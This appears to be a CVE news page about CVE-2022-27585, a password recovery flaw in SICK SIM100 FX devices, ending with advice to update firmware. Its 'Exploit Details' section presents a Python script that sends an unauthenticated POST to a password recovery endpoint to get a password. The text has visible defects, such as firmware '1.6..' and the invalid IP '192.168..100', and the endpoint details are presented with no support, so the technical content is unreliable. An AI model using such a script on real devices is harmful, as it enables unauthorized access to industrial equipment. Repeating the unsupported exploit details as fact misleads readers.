CVE CyberSecurity Database News

CVE-2022-27585: Password Recovery Vulnerability in SICK SIM100 FX Partnumber 1097816 and 1097817

Poster -

Security researchers have discovered a critical vulnerability in SICK SIM100 FX Partnumber 1097816 and 1097817 with firmware versions earlier than 1.6.. This vulnerability allows unprivileged remote attackers to gain access to the user level defined as RecoverableUserLevel by invoking the password recovery mechanism method. Successful exploitation of this vulnerability can lead to increased privileges, impacting the confidentiality, integrity, and availability of the system.

Description

The vulnerability CVE-2022-27585 is a password recovery flaw in SICK SIM100 FX devices with part numbers 1097816 and 1097817, running firmware versions below 1.6.. Attackers can exploit this vulnerability by invoking the password recovery mechanism method, which requires no authentication, and gain access to the RecoverableUserLevel. As a result, an attacker can escalate their privileges, compromise sensitive data, and potentially disrupt system operations.

Exploit Details

The following code snippet demonstrates how an attacker might exploit this vulnerability by invoking the password recovery mechanism method:

import requests

target_ip = "192.168..100"
url = f"http://{target_ip}/api/passwordRecovery";

data = {
    "userLevel": "RecoverableUserLevel"
}

response = requests.post(url, json=data)

if response.status_code == 200:
    print(f"Successfully exploited CVE-2022-27585 on {target_ip}")
    print(f"New recovered password: {response.json()['recoveredPassword']}")
else:
    print(f"Exploitation failed on {target_ip}")

The code above begins by importing the requests library for making HTTP requests. Next, it defines the target IP address of the SICK SIM100 FX device and constructs the URL to access the vulnerable password recovery API endpoint. Then, it creates a JSON payload specifying the desired user level of "RecoverableUserLevel." Lastly, it sends a POST request with the payload to the target URL and prints the results.

For more information about the CVE-2022-27585 vulnerability, please refer to the following sources

1. SICK SIM100 FX Vulnerability Advisory
2. CVE-2022-27585 Details
3. NIST National Vulnerability Database (NVD) Entry

SICK has released a firmware update (version 1.6. or later) to fix the CVE-2022-27585 vulnerability. Affected users should update their SICK SIM100 FX devices to the latest firmware version through the SICK Support Portal as soon as possible. Firmware updates for the affected devices can be found at:

SICK Support Portal

By addressing this vulnerability, users can secure their systems and protect sensitive data from unauthorized access.

Timeline

Published on: 11/01/2022 21:15:00 UTC
Last modified on: 03/31/2023 16:06:00 UTC